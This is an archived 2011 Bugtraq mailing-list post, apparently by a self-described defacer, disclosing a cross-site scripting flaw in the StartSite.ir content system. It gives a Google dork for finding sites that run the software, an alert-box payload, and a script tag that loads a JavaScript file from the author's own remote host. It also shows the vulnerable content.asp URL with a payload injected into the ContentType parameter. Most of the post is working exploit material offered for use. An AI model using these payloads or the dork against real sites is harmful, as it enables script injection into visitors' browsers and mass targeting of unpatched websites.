lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201104051322.p35DMX7v011714@www5.securityfocus.com>
Date: Tue, 5 Apr 2011 07:22:33 -0600
From: md.r00t.defacer@...il.com
To: bugtraq@...urityfocus.com
Subject: StartSite.ir Cross-site Scripting Vulnerability

#------------In The Name Of God------------
# StartSite.ir Cross-site Scripting Vulnerability
###################################
#AUTHOR: md.r00t
#Mail: md.r00t.defacer@...il.com
#Website: www.r00t.gigfa.com
#Forum: http://ajaxtm.com/forum
###################################
#Google D0rk:
# "Powered by StartSite.ir"
###################################
# xss EXPLOIT:
<script>alert(/0/)</script>
<script src="http://md-r00t.persiangig.com/xpl/XSS1.JS"></script>
######VULN IN HERE##################

/content.asp?Catid=247&ContentType=<script>alert(/0/)</script>
####################################
#TNX:
#Ajax Security Team,Aria-Security Team (Persian Security Network),hadihadi & black.shadowes(Virangar Security Team)
*****************************************

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ